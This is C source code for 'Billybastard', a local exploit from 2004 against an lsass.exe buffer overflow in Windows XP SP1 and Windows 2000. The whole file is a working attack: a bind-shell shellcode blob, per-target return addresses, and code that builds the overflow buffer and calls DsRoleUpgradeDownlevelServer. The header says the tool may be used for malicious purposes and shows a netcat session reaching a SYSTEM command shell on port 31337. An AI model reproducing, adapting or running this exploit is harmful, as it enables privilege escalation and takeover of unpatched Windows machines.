/*

 Billybastard.c !!!!

 The following code is functional code to exploit the lsass.exe flaw
 discovered by eeye. This is the local version of the exploit. I will
 release a remote version if someone pays me ;) Use at your free will, 
 to test for the vulnerability or for malicious means. I do not give a 
 fuck.

 Greetz: Dayle, Sc, breezah, RaFa, netmaniac, nightforce, prog, illmob group
		and everyone else i forgot to mention.

 Big thanks to netmaniac for hints on the undocumented api and making me 
 aware of the bug etc.

 Obstacles encountered during developing the code:

 The biggest problem was probably the fact that the area pointed to
 by ESP was actually a very limited place where we had control of 
 (8 bytes to be precised). There is no way decent shellcode would
 fit into it. So what i done was relocated my shellcode somewhere 
 else in the buffer and performed a bit of hackery to jump backwards 
 into the place where the shellcode was located. I also had to make 
 sure the registers were kept intact and cleaned up but this was not 
 a problem.

 --------------

C:\Documents and Settings\ronan>nc 127.0.0.1 31337

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

 ----------------

 Coded by Hi_Tech_Assassin 

 date: 15/4/04

*/

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

#pragma comment(lib,"rpcrt4.lib")

#define NET_LIB			"netapi32.dll"		
#define NET_LIB_FUNC	"DsRoleUpgradeDownlevelServer"

#define BUFSIZE			2000
#define NOP				0x90

struct targets
{
	int targetNo;
	char platform[40];
	long jmpAddr;

} target[]=
{
	{1,"win xp(sp1 all patches) kernel32.dll", 0x77E9AE59}, // tested
	{2,"win2k(all)", 0x0018759F},	 // untested
	{3,"crash", 0xffffffff},
	{NULL}
};

char shellcode[] = 

	"\x90"
	"\x8B\xEC"      //mov ebp, esp
	"\xB0\x90"      //mov al, 90h
	"\x2B\xE0"      //sub esp, eax
	"\x90\x90\x90"

	"\xeb\x23\x7a\x69\x02\x05\x6c\x59\xf8\x1d\x9c\xde\x8c\xd1\x4c"
	"\x70\xd4\x03\xf0\x27\x20\x20\x30\x08\x57\x53\x32\x5f\x33\x32"
	"\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d\x83\xed"
	"\x2a\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b"
	"\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01\xfb\x8b"
	"\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b\x5b\x20"
	"\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe\xac\x31"
	"\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x05\x8d\x44\x45\x04"
	"\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50\x52\x2b"
	"\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f\xb6\x4d"
	"\x05\x89\x44\x8d\xd8\xfe\x4d\x05\x75\xbe\xfe\x4d\x04\x74\x21"
	"\xfe\x4d\x22\x8d\x5d\x18\x53\xff\xd0\x89\xc7\x6a\x04\x58\x88"
	"\x45\x05\x80\x45\x77\x0a\x8d\x5d\x74\x80\x6b\x26\x14\xe9\x78"
	"\xff\xff\xff\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46\x56\xff"
	"\xd0\x97\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff\x55\xd4\x4e"
	"\x56\x57\xff\x55\xcc\x53\x55\x57\xff\x55\xd0\x97\x8d\x45\x88"
	"\x50\xff\x55\xe4\x55\x55\xff\x55\xe8\x8d\x44\x05\x0c\x94\x53"
	"\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45"
	"\xcc\x94\x57\x57\x57\x53\x53\xfe\xc6\x01\xf2\x52\x94\x8d\x45"
	"\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52"
	"\x53\x53\x53\x55\xff\x55\xec\x6a\xff\xff\x55\xe0";

void Banner(void)
{
	puts("\nBillybastard (local lsass ownage exploit)");
}

void Usage(void)
{
  int x=0;
	
  printf("\nUsage:\n\n Billybastard <target no>\n\nTargets\n\n");
  while(target[x].targetNo)
  {
      printf("[%d] - %s\n", target[x].targetNo, target[x].platform);
      x++;
  }
  printf("\nCoded by: Hi Tech Assassin\n");
}

int main(int argc, char **argv)
{
	HMODULE hNetLib;
	FARPROC NetLibFunc;

	char junk[]="\xee\xee\xee";

	char strAsmSex[]="\x66\x81\xEC\x1C\x07\xFF\xE4";

	char strBigBuffer[BUFSIZE];
	unsigned int targetNo=0;

	unsigned char * pszUuid             = NULL;
        unsigned char * pszProtocolSequence = "ncacn_np";
        unsigned char * pszNetworkAddress   = NULL;
        unsigned char * pszEndpoint    = "\\pipe\\lsarpc";
        unsigned char * pszOptions          = NULL;
        unsigned char * pszStringBinding    = NULL;
        unsigned char * pszString      = NULL;

	RPC_STATUS rpcStatus;

	Banner();

	if(argc==2)targetNo=atoi(argv[1])-1;

	else
	{
		Usage();
		return 0;
	}
		
	rpcStatus=RpcStringBindingCompose(pszUuid,
                                     pszProtocolSequence,
                                     pszNetworkAddress,
                                     pszEndpoint,
                                     pszOptions,
                                     &pszStringBinding);
	if(rpcStatus)
	{
		printf("rpcbind error\n");
		return 1;
	}

	printf("rpcbind success!\n");

	hNetLib = LoadLibrary(NET_LIB);

	if(hNetLib == NULL)
	{
		printf("[x] Error loadin' library %s\n Exitin'...\n",NET_LIB);
		return 1;
	}

	NetLibFunc = (HANDLE)GetProcAddress(hNetLib,NET_LIB_FUNC);

	memset(strBigBuffer, NOP, BUFSIZE);

	memcpy(strBigBuffer+160, shellcode, strlen(shellcode));
	memcpy(strBigBuffer+1980, strAsmSex, strlen(strAsmSex));

	*(long *)&strBigBuffer[1964]=target[targetNo].jmpAddr;

	NetLibFunc(strBigBuffer,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk,junk);

	RpcStringFree(&pszStringBinding);
	FreeLibrary(hNetLib);

	return 0;
}